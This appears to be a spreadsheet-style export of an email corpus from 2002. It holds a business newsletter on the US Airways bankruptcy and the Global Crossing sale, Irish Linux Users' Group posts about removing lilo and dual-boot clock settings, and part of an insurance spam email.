 bandits. That's a lot of paper bits on any floor. - Deborah
 Asbrand
 Hobbled Global Crossing Accepts Buyout Bid From Asian
 Investors
 http://online.wsj.com/article/0,,SB1028898681279625080,00.html
 (Paid subscription required.) 
 Buyers to pay $250 million for Global Crossing (AP)
 http://www.bayarea.com/mld/mercurynews/2002/08/10/business/3837152.htm
 Global Crossing seals revival deal
 http://news.bbc.co.uk/2/hi/business/2183600.stm
 Firms to Buy Majority Of Global Crossing
 http://www.washingtonpost.com/wp-dyn/articles/A959-2002Aug9.html
 Before Telecom Bubble Burst, Some Insiders Sold Out Stakes
 http://online.wsj.com/article/0,,SB1029102020679872395.dzzz,00.html
 (Paid subscription required.) 
 -----------------------------------------------------------------
 OTHER STORIES
 -----------------------------------------------------------------
 A Bertelsmann Heir Jockeys to Be Heir Apparent
 http://www.nytimes.com/2002/08/12/business/media/12BERT.html
 Martha Stewart likely to be subpoenaed
 http://www.salon.com/tech/wire/2002/08/11/stewart/index.html
 US fraud law confuses Europe's top companies
 http://tinyurl.com/zqj
 Race to Tell AOL Time Warner Story
 http://www.nytimes.com/2002/08/12/business/media/12BOOK.html
 Creditors seek more WorldCom data (Wall Street Journal)
 http://www.msnbc.com/news/792924.asp
 Interpretation of Law Could Lead to Ban on Range of Executive
 Perks
 http://www.latimes.com/news/printedition/front/la-fi-murky12aug12.story
 Blockbuster Fallout at Netflix
 http://www.nytimes.com/2002/08/12/technology/12ECOM.html
 Microsoft changes its tune toward Linux
 http://seattletimes.nwsource.com/html/businesstechnology/134511508_linux12.html
 Spamming the World (Newsweek)
 http://www.msnbc.com/news/792491.asp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http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org
 To receive future messages in HTML format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org%2Chtm
 To change your subscriber information, use this link:
 http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org
 ------------=_1029157891-23956-4
 Content-Type: text/html; charset="iso-8859-1"
 Content-Disposition: inline
 Content-Transfer-Encoding: 7bit
 &lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;title&gt;M E D I A  U N S P U N&lt;/title&gt;
 &lt;!--  
 **********************************************************
 If you can read this message but the rest of the email 
 contains strange characters, your email program is not
 capable of displaying HTML email. Use your browser to read the
 complete newsletter online at: 
    http://newsletter.mediaunspun.com/
 To receive future messages in plain text format, use this link:
 http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org%2Ctxt
 **********************************************************
 CREATED: August 12, 2002   
 --&gt;
 &lt;meta name="description" content=""&gt;
 &lt;meta name="keywords" content=""&gt;
 &lt;meta name="GENERATOR" content="iMakeNews"&gt;
 &lt;meta name="robots" content="ALL"&gt;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.a22481297394458-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a22481297394458-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a22481297394458-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a22481297394458-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a22481297394458-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a22481297394458-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a22481297394458-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a22481297394458-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a22481297394458-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a22481297394458-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a22481297394458-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a22481297393910-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a22481297393910-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a22481297393910-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Article View Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a22481297391075-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a22481297391075-contents_article_title{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a22481297391075-contents_article_title:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 --&gt;
 &lt;/style&gt;
 &lt;!-- Footer Styles --&gt;
 &lt;style type='text/css'&gt;
 &lt;!--
 .a22481297401040-section_heading{color:#FFFFFF;background-color:#000000;font-family:arial;font-size:x-small;font-weight:bold;font-style:normal;text-decoration:none;text-align:left}
 .a22481297401040-footer_publisher{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a22481297401040-footer_publisher:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:underline}
 .a22481297401040-footer_copyright{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a22481297401040-footer_disclaimer{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:normal;font-style:normal;text-decoration:none}
 .a22481297401040-footer_tellafriend{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a22481297401040-footer_tellafriend:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a22481297401040-footer_archive{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a22481297401040-footer_archive:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}
 .a22481297401040-footer_pdf{color:#000000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:none}
 .a22481297401040-footer_pdf:hover{color:#FF0000;background-color:transparent;font-family:verdana;font-size:xx-small;font-weight:bold;font-style:normal;text-decoration:underline}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000018838.cfm&amp;XXDESXXissue_id=18838&amp;XXDESXXtitle=M%20E%20D%20I%20A%20%20U%20N%20S%20P%20U%20N"
 			 class="a22481297394458-footer_tellafriend"&gt;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src="http://a298.g.akamai.net/7/298/5382/081202090740/www.imakenews.com/mediaunspun/mediaunspun_logo.GIF" BORDER="0" alt="M E D I A  U N S P U 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Monday, August 12, 2002
 				&lt;/font&gt;
 			&lt;/td&gt;
 				&lt;td align="center" width="34%"&gt;
 			&lt;/td&gt;
 				&lt;td align="right" width="33%"&gt;
 			&lt;/td&gt;
 		&lt;/tr&gt;
 		&lt;/table&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 1 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table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HREF="#a87131"
 						class="a22481297393910-contents_article_title"
 				&gt;
 			Brother, Can You Spare a Jet?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HREF="#a87132"
 						class="a22481297391075-contents_article_title"
 				&gt;
 			Remember Global Crossing?
 			&lt;/a&gt;&lt;/font&gt;
 			&lt;br&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td&gt;&lt;img src="http://www.imakenews.com/eletra/empty.gif" height="1" width="1"&gt;&lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 			&lt;font face="Verdana,Arial" size="1"&gt;
 				&lt;A HREF="#a87133"
 						class="a22481297391075-contents_article_title"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&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Media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&lt;P&gt;Ken Fisher offers his Quarterly Report for high net worth investors FREE of cost &amp; without obligation. Access the same investment research he uses to guide his clients at:&lt;br&gt;
 &lt;A HREF="http://pcg.fisherinvestments.com/newrespond/letter.asp?site=UNSP&amp;KC=1229EFCAD0000"&gt;http://pcg.fisherinvestments.com/newrespond/letter.asp?site=UNSP&amp;KC=1229EFCAD0000&lt;/A&gt;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name="a87131"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Brother, Can You Spare a Jet?
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Creditors and shareholders of U.S. Airways found themselves in the upright and locked position Sunday as the nation's sixth-largest airline filed for bankruptcy protection.&lt;/P&gt;&lt;P&gt;
 The Arlington, Va.-based carrier sought cover under the bankruptcy code's Chapter 11, but much of its trouble could be traced to Sept. 11. Remember when all U.S. airports reopened except for Reagan Washington, which was too close to the White House and other gov sites? Remember how it was weeks before the first lonely flights lifted at last? Guess which airline was the major carrier there. (Hint: It's the same one that bled $2 billion in the past year.)&lt;/P&gt;&lt;P&gt;
 Even before the terror attacks, U.S. Airways was an animal in pain. To all the usual industry troubles, add these: fierce competition from discounters, a too-small area of service concentrated on the East Coast, and an unofficial battle with United Airlines for the highest labor costs in the business. Frustrated, the carrier tried to throw in the towel two years ago, reminded the Washington Post. In a bid to get bought by United, U.S. Airways pleaded to federal antitrust regulators that it was
 too small to survive on &lt;br&gt;
 its own. The feds disagreed and blocked the deal.&lt;/P&gt;&lt;P&gt;
 Now, of course, U.S. Airways has a new flight plan. Among those likely to get airsick: shareholders, whose investment has vanished; employees, many of whom are expected to lose their jobs, even though their unions have conceded hundreds of millions of dollars in pay; and creditors, especially plane-leasing companies, which will collect only as much as a bankruptcy judge approves. (Where, by the way, is the reporter who will pick up the story of these leasing companies? Not one creditor was
 named in any account we could find. Yet before we soak our hankies over U.S. Airways, we'd like to hear a word from the folks getting stiffed.)&lt;/P&gt;&lt;P&gt;
 Need a silver lining? Check out the Wall Street Journal, which observes that Continental Airlines "soared to profitability" thanks to its time in rehab a decade ago. We're guessing that anecdote is on the minds of Texas Pacific Group, which is plunking down $200 million for two-fifths of U.S. Airways. Texas Pacific also played friend in need to Continental -- and pocketed 11 times its investment.&lt;/P&gt;&lt;P&gt;
 Meanwhile, it will be "business as usual" for U.S. Airways customers, the company's chief assured a skeptical New York Times. The airline will even continue to track and to honor frequent-flier miles. Better still: Cautious customers can use U.S. Airways miles to book flights with its marketing partner, United. And, hey, according to an analyst quoted in the Journal, there's at least a 20% chance that United won't be the next major carrier to announce it's gone broke. - Lori Patel&lt;/P&gt;&lt;P&gt;
 US Airways Files for Chapter 11&lt;br&gt;
 &lt;A HREF="http://abcnews.go.com/wire/Business/ap20020811_1301.html"&gt;http://abcnews.go.com/wire/Business/ap20020811_1301.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 US Airways Announces Bankruptcy&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/08/12/business/12AIR.html"&gt;http://www.nytimes.com/2002/08/12/business/12AIR.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Shifts to Cause Rerouting of Some Booked Fliers&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/08/12/business/12CONS.html"&gt;http://www.nytimes.com/2002/08/12/business/12CONS.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 US Airways Files for Bankruptcy Protection&lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A6587-2002Aug11.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A6587-2002Aug11.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 US Airways Group, Hit Hard By Terror, Files for Chapter 11&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/article/0,,SB1029103594827437995,00.html"&gt;http://online.wsj.com/article/0,,SB1029103594827437995,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required.)&lt;/P&gt;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You've heard about identity management, but do you know about the opportunities and business models that will emerge as a result? &lt;a href="http://release1.edventure.com/executivesummary.cfm?MCode=Unspun"&gt;Download&lt;/a&gt; a free executive summary of Esther Dyson's coverage of identity management in Release 1.0. Learn more about the expanding market for these services and applications.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name="a87132"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Remember Global Crossing?
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;Follow-up has never been the media's strong suit. Once stories fade from page one, so does reporters' interest. And in this summer of corporate scandals, remembering back to Global Crossing's January implosion and bankruptcy is akin to trying to recall the fuss over chads.&lt;/P&gt;&lt;P&gt;
 The Financial Times pegged the company's bankruptcy sale Friday a "long-awaited" transaction, but few other outlets seemed to be holding their breath. The dearth of coverage is too bad, because the shock value of the numbers alone is worth attention, especially with Enron and WorldCom following behind it in the Chapter 11 aisle. Bankruptcy, it seems, means never having to say you're sorry. Global Crossing owed $12 billion when it filed for bankruptcy in January. Its sale price? $250 million --
 and that's for only a nearly two-thirds stake. Sound too low? Back in January, Global Crossing could have gotten much more, three times that much, and from the very same investment team, Asian conglomerates Hutchison Whampoa and Singapore Technologies Telemedia. But Global Crossing sniffed it was worth way more. &lt;/P&gt;&lt;P&gt;
 Now that it has discovered it's worth way less, here's how the deal carves up what's left of Global Crossing's pie, pending the regulatory approval that's expected in about six months. The two investors get a 61.5% stake; bank creditors get 6%, and bondholders get about a one-third share. Who's missing from the slice-and-dice? Shareholders, of course, who get nothing. The company is unapologetic, and creditors feel lucky for the crumbs. "The reality is we could have done considerably worse,"
 the Wall Street Journal quoted Edward Weisenfelder, a lawyer for the creditors. As for the shrewd buyers, the Financial Times quoted Hutchison's official statement that the deal would extend its telecom capabilities, particularly in its broadband service. But the Wall Street Journal speculated that the company is simply buying low so it can sell higher. &lt;/P&gt;&lt;P&gt;
 Global Crossing's turned-down offer of $750 million is approximately the same amount the company's founder, Gary Winnick, reaped in personal riches from the sale of his stock, as the Journal noted in its page-one story on the telecom bandits. That's a lot of paper bits on any floor. - Deborah Asbrand&lt;/P&gt;&lt;P&gt;
 Hobbled Global Crossing Accepts Buyout Bid From Asian Investors&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/article/0,,SB1028898681279625080,00.html"&gt;http://online.wsj.com/article/0,,SB1028898681279625080,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required.) &lt;/P&gt;&lt;P&gt;
 Buyers to pay $250 million for Global Crossing (AP)&lt;br&gt;
 &lt;A HREF="http://www.bayarea.com/mld/mercurynews/2002/08/10/business/3837152.htm"&gt;http://www.bayarea.com/mld/mercurynews/2002/08/10/business/3837152.htm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Global Crossing seals revival deal&lt;br&gt;
 &lt;A HREF="http://news.bbc.co.uk/2/hi/business/2183600.stm"&gt;http://news.bbc.co.uk/2/hi/business/2183600.stm&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Firms to Buy Majority Of Global Crossing&lt;br&gt;
 &lt;A HREF="http://www.washingtonpost.com/wp-dyn/articles/A959-2002Aug9.html"&gt;http://www.washingtonpost.com/wp-dyn/articles/A959-2002Aug9.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Before Telecom Bubble Burst, Some Insiders Sold Out Stakes&lt;br&gt;
 &lt;A HREF="http://online.wsj.com/article/0,,SB1029102020679872395.dzzz,00.html"&gt;http://online.wsj.com/article/0,,SB1029102020679872395.dzzz,00.html&lt;/A&gt; &lt;br&gt;
 (Paid subscription required.) &lt;/P&gt;
 					&lt;br&gt;
 			&lt;/font&gt;
 		&lt;/td&gt;&lt;/tr&gt; 
 	&lt;tr bgcolor="#FFFFFF"&gt;&lt;td&gt;
 	&lt;a name="a87133"&gt;&lt;/a&gt;  
 			&lt;font face="Arial" size="4"&gt;&lt;b&gt;
 			Other Stories
 			&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;br&gt;
 			&lt;font face="verdana,arial" size="2"&gt;
 					&lt;P&gt;A Bertelsmann Heir Jockeys to Be Heir Apparent&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/08/12/business/media/12BERT.html"&gt;http://www.nytimes.com/2002/08/12/business/media/12BERT.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Martha Stewart likely to be subpoenaed&lt;br&gt;
 &lt;A HREF="http://www.salon.com/tech/wire/2002/08/11/stewart/index.html"&gt;http://www.salon.com/tech/wire/2002/08/11/stewart/index.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 US fraud law confuses Europe's top companies&lt;br&gt;
 &lt;A HREF="http://tinyurl.com/zqj"&gt;http://tinyurl.com/zqj&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Race to Tell AOL Time Warner Story&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/08/12/business/media/12BOOK.html"&gt;http://www.nytimes.com/2002/08/12/business/media/12BOOK.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Creditors seek more WorldCom data (Wall Street Journal)&lt;br&gt;
 &lt;A HREF="http://www.msnbc.com/news/792924.asp"&gt;http://www.msnbc.com/news/792924.asp&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Interpretation of Law Could Lead to Ban on Range of Executive Perks&lt;br&gt;
 &lt;A HREF="http://www.latimes.com/news/printedition/front/la-fi-murky12aug12.story"&gt;http://www.latimes.com/news/printedition/front/la-fi-murky12aug12.story&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Blockbuster Fallout at Netflix&lt;br&gt;
 &lt;A HREF="http://www.nytimes.com/2002/08/12/technology/12ECOM.html"&gt;http://www.nytimes.com/2002/08/12/technology/12ECOM.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Microsoft changes its tune toward Linux&lt;br&gt;
 &lt;A HREF="http://seattletimes.nwsource.com/html/businesstechnology/134511508_linux12.html"&gt;http://seattletimes.nwsource.com/html/businesstechnology/134511508_linux12.html&lt;/A&gt; &lt;/P&gt;&lt;P&gt;
 Spamming the World (Newsweek)&lt;br&gt;
 &lt;A HREF="http://www.msnbc.com/news/792491.asp"&gt;http://www.msnbc.com/news/792491.asp&lt;/A&gt; &lt;/P&gt;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value="http://newsletter.mediaunspun.com/index000018838.cfm"&gt;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 &lt;font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COLUMN: 3 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;table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000018838.cfm&amp;XXDESXXissue_id=18838&amp;XXDESXXtitle=M%20E%20D%20I%20A%20%20U%20N%20S%20P%20U%20N"
 			 class="a22481297401040-footer_tellafriend"&gt;
 			&lt;font size=4&gt;TELL A FRIEND&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;
 			&lt;/font&gt;
 			&lt;/td&gt;
 	  &lt;/tr&gt;
 	&lt;/table&gt;&lt;/div&gt;
 	&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
 			&lt;!-- COLUMN: 4 --&gt;
 		&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;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zzz-unspun@spamassassin.taint.org &lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/remove.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org"&gt;Click here&lt;/a&gt; to be instantly removed from this list.&lt;br&gt;&lt;a href="http://www.imakenews.com/eletra/change.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org%2Ctxt"&gt;Click here&lt;/a&gt; to receive future messages in plain text format.&lt;br&gt;&lt;/font&gt;&lt;font face="verdana,arial" size="1"&gt;&lt;a
 href="http://www.imakenews.com/eletra/update.cfm?x=mediaunspun%2Czzz-unspun@spamassassin.taint.org"&gt;Click here&lt;/a&gt; to change your subscriber information and preferences.&lt;br&gt;&lt;/font&gt;&lt;/tr&gt;&lt;/table&gt; &lt;!--Ver. 7--&gt;
 		&lt;p&gt;&amp;nbsp;
        &lt;img src="http://machina.imakenews.com/E176311,5114587XXmediaunspunXX18838XXXXindex000018838.cfmXXemailXX5114587XXXX0Y0XX1" alt="" height="0" width="0"&gt;		 
 		&lt;/p&gt;
 &lt;/div&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------------=_1029157891-23956-4--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] Re: removing lilo
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; == SoloCDM
 &gt;&gt; == Bryan Hunt
 &gt;&gt; choose the repair option when installing windows nt/2000/whatever
 &gt; What is the "repair option"?
 When you boot from the WNT/W2k/whatever install CD, it offers you the
 choice of installing a new system, or repairing an existing
 installation.
            Colm
 -- 
 Colm Buckley | colm@tuatha.org | +353 87 2469146 | www.colm.buckley.name
 Why be difficult when, with a bit of effort, you could be impossible?
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; will have problems though if you use Windows, as it will tell wrong time
 &gt; for half the year, and will reset the clock when you boot into it after
 &gt; the change in time (this might be fixed in XP/2000, I don't know).
 &gt; Even if you set the hwclock to localtime, you will get problems when you
 &gt; boot into windows, as both Linux and Windows will try to alter the
 &gt; hwclock (maybe there is a way to suppress windows doing this).
 &gt; m
 Hi there,
 I recently delved into how the linux system clock and the hardware clock
 interact with each other when I set up ntp on my system while connected
 to the net. However, I didn't realise that Windows altered the hw clock
 as there was no mention of it in any of the docs I read. 
 I still dual-boot on a regular basis and if Windows is sneakily messing
 with the clock, I'd be interested to know in what way it is and how it
 couild be stopped from doing so. Everything seems to work fine since I
 set the system up but I still don't like to have these gaps in my
 knowledge.
 Regards,
 Anthony Geoghegan
 -- 
 The worst sin towards our fellow creatures is not to hate them,
 but to be indifferent to them. That is the essence of inhumanity
  - George Bernard Shaw
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Let the TBA Doctor Save Your Tough Cases
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_1EA50_01C1D02A.8CB39DF0
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: 7bit
  Let the TBA Doctor Save Your Tough Cases! Healthy Clients need not
 apply!
 Sex	 Age	 Face Amt.	 Condition	 Other Co's	 TBA
 Female	 87	 $2,000,000	 High Blood Pressure	 Standard
 Preferred!	 
 Male	 60	 $500,000	 Aneurysm - Treated Surgically	 Decline
 Standard!	 
 Male	 57	 $1,000,000	 Heart Attack 1997 &amp; Pacemaker	 Table 6
 Standard!	 
 Female	 57	 $500,000	 Diabetic for 34 years	 Table 4
 Standard!	 
 Male	 51	 $1,500,000	 Alcohol Abuse (Dry 1 year)	 Decline
 Standard!	 
 Male	 50	 $2,500,000	 1/2 pack a day cigarette smoker
 Pref. Smoker	 Pref. Nonsmoker!	 
 Male	 47	 $2,000,000	 Tobacco Chewer	 Smoker	 Pref.
 Nonsmoker!	 
 Visit us at www.tba.com or 800-624-4502x18
 &lt;http://nettrac.ipipeline.com/askdoctor/doctor.asp?gaid=0162&gt; 
 Please fill out the form below for more information	 
 Name:	  	
 E-mail:	  	
 Phone:	  	
 City:	  	State:	  	
 We don't want anybody to receive our mailings who does not wish to
 receive them. This is professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: http://www.InsuranceIQ.com/optout 
 ------=_NextPart_000_1EA50_01C1D02A.8CB39DF0
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Let the TBA Doctor Save Your Tough Cases&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#FFFFFF" text=3D"#000000"&gt;
 &lt;table width=3D"550" border=3D"0" cellspacing=3D"5" cellpadding=3D"0" =
 align=3D"center" bgcolor=3D"#33CC99"&gt;
   &lt;tr&gt;=20
     &lt;td align=3D"center" bgcolor=3D"#FFFFFF"&gt; &lt;img =
 src=3D"http://63.211.81.87/images/tba4/tbadoc.jpg" width=3D"550" =
 height=3D"302" alt=3D'Let the TBA Doctor Save Your Tough Cases! Healthy =
 Clients need not apply!'&gt;=20
       &lt;table border=3D"0" cellspacing=3D"1" bgcolor=3D"#000000" =
 width=3D"99%"&gt;
         &lt;tr bgcolor=3D"#33CC99"&gt;=20
           &lt;td&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Sex&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;td&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Age&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;td&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Face Amt.&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;td&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Condition&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;td&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Other Co's&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;td&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;TBA&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr bgcolor=3D"#FFFFFF"&gt;=20
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Female&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;87&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;$2,000,000&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;High Blood Pressure&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Standard&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#FF0000"&gt;Preferred!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr bgcolor=3D"#FFFFFF"&gt;=20
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Male&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;60&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;$500,000&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Aneurysm - Treated Surgically&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Decline&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;b&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2" =
 color=3D"#FF0000"&gt;Standard!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr bgcolor=3D"#FFFFFF"&gt;=20
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;Male&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;57&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
 size=3D"2"&gt;$1,000,000&lt;/font&gt;&lt;/td&gt;
           &lt;td&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" =
